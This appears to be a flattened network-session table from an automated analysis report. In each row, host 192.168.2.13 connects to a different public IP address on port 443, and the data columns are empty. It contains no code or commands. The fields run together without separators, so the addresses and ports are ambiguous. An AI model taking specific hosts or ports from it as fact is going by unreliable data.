                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12613192.168.2.1352646147.244.240.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12614192.168.2.1345592200.114.130.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12615192.168.2.135551827.51.176.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12616192.168.2.134456249.58.255.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12617192.168.2.1348896174.116.232.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12618192.168.2.133777425.100.204.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12619192.168.2.1339772208.169.172.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12620192.168.2.1347156122.12.207.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12621192.168.2.1337532177.148.116.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12622192.168.2.135326067.146.153.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12623192.168.2.133711878.242.21.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12624192.168.2.135071657.253.188.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12625192.168.2.1344852198.107.72.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12626192.168.2.1351604184.32.229.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12627192.168.2.133609839.91.6.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12628192.168.2.1336454219.65.131.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12629192.168.2.134505467.3.190.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12630192.168.2.1359774125.102.184.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12631192.168.2.135562298.124.242.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12632192.168.2.1339832210.77.122.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12633192.168.2.135783082.63.84.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12634192.168.2.1348096222.175.48.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12635192.168.2.134067496.244.144.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12636192.168.2.134761884.122.237.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12637192.168.2.1347578120.96.32.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12638192.168.2.134147847.44.174.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12639192.168.2.1351546100.137.89.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12640192.168.2.135313284.39.145.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12641192.168.2.133378040.5.224.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12642192.168.2.1339946108.120.171.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12643192.168.2.1359156111.138.202.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12644192.168.2.1342952198.221.178.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12645192.168.2.1338034176.81.82.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12646192.168.2.1333916109.239.224.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12647192.168.2.1348960221.173.103.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12648192.168.2.1338474220.232.218.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12649192.168.2.135752070.187.221.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12650192.168.2.1344326162.98.1.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12651192.168.2.1334502155.32.90.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12652192.168.2.1351190179.46.6.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12653192.168.2.135668482.57.186.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12654192.168.2.135455263.124.234.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12655192.168.2.1341320157.251.5.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12656192.168.2.1341454116.41.88.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12657192.168.2.1351150105.154.101.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12658192.168.2.134684278.241.182.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12659192.168.2.135115889.77.200.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12660192.168.2.1349250138.48.11.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12661192.168.2.1346124171.48.7.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12662192.168.2.1337508198.138.179.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12663192.168.2.135248453.20.253.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12664192.168.2.1352390144.84.214.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12665192.168.2.134659045.130.151.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12666192.168.2.1349114207.124.19.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12667192.168.2.1347002114.116.194.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12668192.168.2.1354426105.99.149.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12669192.168.2.1358262163.115.213.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12670192.168.2.1356376181.5.65.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12671192.168.2.1334548206.189.151.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12672192.168.2.1336326105.239.224.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12673192.168.2.1348274193.225.71.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12674192.168.2.134203470.249.162.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12675192.168.2.1356652141.76.198.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12676192.168.2.135499497.253.138.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12677192.168.2.1346944189.186.241.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12678192.168.2.1350108133.18.125.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12679192.168.2.1357360102.177.193.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12680192.168.2.135283482.192.60.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12681192.168.2.1358310103.40.124.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12682192.168.2.135477881.31.163.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12683192.168.2.135743892.143.188.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12684192.168.2.135572272.174.157.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12685192.168.2.1352374163.95.41.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12686192.168.2.1348340206.239.75.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12687192.168.2.135798076.80.71.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12688192.168.2.1335838199.31.173.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12689192.168.2.133530682.228.211.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12690192.168.2.1336966177.137.176.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12691192.168.2.133517895.101.112.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12692192.168.2.1339960124.17.16.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12693192.168.2.1337408112.180.39.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12694192.168.2.134644417.4.180.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12695192.168.2.135304672.222.91.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12696192.168.2.1354418109.65.209.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12697192.168.2.135495888.39.95.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12698192.168.2.1358778167.247.103.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12699192.168.2.133307847.203.30.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12700192.168.2.133804495.191.122.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12701192.168.2.1343468154.152.192.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12702192.168.2.1336144128.90.207.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12703192.168.2.1349382212.140.95.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12704192.168.2.1347986116.79.101.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12705192.168.2.135096464.8.221.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12706192.168.2.1350684181.43.145.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12707192.168.2.135561617.111.252.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12708192.168.2.135243441.81.104.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12709192.168.2.1342682107.132.236.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12710192.168.2.1358292124.241.127.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12711192.168.2.1347692141.225.44.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12712192.168.2.134571061.151.251.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12713192.168.2.1360624135.199.62.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12714192.168.2.133879241.126.26.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12715192.168.2.133844866.167.46.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12716192.168.2.1343130119.222.171.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12717192.168.2.135006294.24.9.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12718192.168.2.1337084192.97.63.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12719192.168.2.133768698.171.155.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12720192.168.2.1350564159.24.189.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12721192.168.2.1336112190.153.36.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12722192.168.2.13593128.120.101.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12723192.168.2.1335788119.229.138.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12724192.168.2.1338198121.114.167.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12725192.168.2.1342500171.121.169.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12726192.168.2.134206051.183.243.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12727192.168.2.1356236189.32.174.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12728192.168.2.1337728161.156.85.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12729192.168.2.136084614.30.93.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12730192.168.2.133593844.174.170.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12731192.168.2.1340214119.107.14.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12732192.168.2.1355788151.57.71.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12733192.168.2.1356226158.135.168.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12734192.168.2.1336800161.116.138.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12735192.168.2.135729486.135.160.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12736192.168.2.13546749.10.51.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12737192.168.2.1351098201.145.2.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12738192.168.2.133851646.255.185.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12739192.168.2.1355192102.184.74.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12740192.168.2.1358716210.129.190.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12741192.168.2.1338150175.76.115.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12742192.168.2.1336772191.64.76.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12743192.168.2.1343496139.230.91.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12744192.168.2.135994860.178.32.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12745192.168.2.1354926167.240.67.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12746192.168.2.1344532205.165.63.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12747192.168.2.1345578122.75.239.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12748192.168.2.13461929.71.222.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12749192.168.2.1351246106.181.40.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12750192.168.2.1344088152.139.81.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12751192.168.2.1335060143.127.110.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12752192.168.2.1336842102.13.106.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12753192.168.2.133984067.64.203.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12754192.168.2.136094012.45.63.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12755192.168.2.1346608137.0.61.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12756192.168.2.1359920105.240.117.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12757192.168.2.1346830104.5.212.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12758192.168.2.134961669.172.220.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12759192.168.2.1334508153.138.174.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12760192.168.2.134607688.140.15.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12761192.168.2.136042692.104.136.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12762192.168.2.133901831.20.253.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12763192.168.2.1351272175.94.214.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12764192.168.2.1357296194.32.215.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12765192.168.2.135848659.149.132.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12766192.168.2.1346434165.136.101.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12767192.168.2.135329876.15.47.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12768192.168.2.135435047.73.6.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12769192.168.2.1338382108.28.137.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12770192.168.2.1359582140.126.227.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12771192.168.2.1336296202.76.186.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12772192.168.2.135690441.105.109.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12773192.168.2.1353632132.73.51.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12774192.168.2.135616040.246.167.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12775192.168.2.1354588121.175.48.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12776192.168.2.1335260210.117.158.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12777192.168.2.134198461.50.165.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12778192.168.2.134162288.164.240.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12779192.168.2.134440880.180.38.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12780192.168.2.1347864150.225.78.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12781192.168.2.1343896118.221.168.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12782192.168.2.1344382146.176.145.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12783192.168.2.1359486154.12.30.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12784192.168.2.1354912210.130.53.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12785192.168.2.13352421.95.249.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12786192.168.2.135217669.209.22.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12787192.168.2.1352024125.136.182.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12788192.168.2.1357758189.24.175.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12789192.168.2.133721698.189.199.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12790192.168.2.135438077.8.113.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12791192.168.2.1352104144.94.12.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12792192.168.2.1334048117.91.34.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12793192.168.2.1344690163.153.155.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12794192.168.2.1344386115.171.148.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12795192.168.2.1358446146.96.150.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12796192.168.2.135684666.186.21.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12797192.168.2.1357836124.135.242.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12798192.168.2.13377905.46.100.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12799192.168.2.1344982211.222.209.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12800192.168.2.133547243.47.228.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12801192.168.2.135435841.185.217.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12802192.168.2.1345920130.152.105.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12803192.168.2.133491449.199.171.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12804192.168.2.135075689.25.153.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12805192.168.2.1343090135.56.16.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12806192.168.2.135689072.182.17.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12807192.168.2.133515690.137.83.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12808192.168.2.1353978160.54.212.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12809192.168.2.1344790217.122.240.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12810192.168.2.133620268.112.51.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12811192.168.2.1351294128.142.25.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12812192.168.2.1359102193.92.1.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12813192.168.2.1332814135.201.83.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12814192.168.2.135560677.58.137.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12815192.168.2.134799090.162.146.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12816192.168.2.1352988188.20.219.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12817192.168.2.1354040176.196.108.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12818192.168.2.1345982186.117.244.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12819192.168.2.13549284.102.24.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12820192.168.2.1344500147.183.56.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12821192.168.2.1336882204.51.106.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12822192.168.2.135063891.206.223.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12823192.168.2.1358818147.218.36.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12824192.168.2.135970049.142.111.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12825192.168.2.1340206142.206.121.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12826192.168.2.1349548103.86.214.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12827192.168.2.1344170180.186.64.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12828192.168.2.134818640.69.208.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12829192.168.2.133702284.62.202.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12830192.168.2.1333536161.235.201.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12831192.168.2.133354827.99.69.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12832192.168.2.1334812202.71.217.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12833192.168.2.1337228119.112.230.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
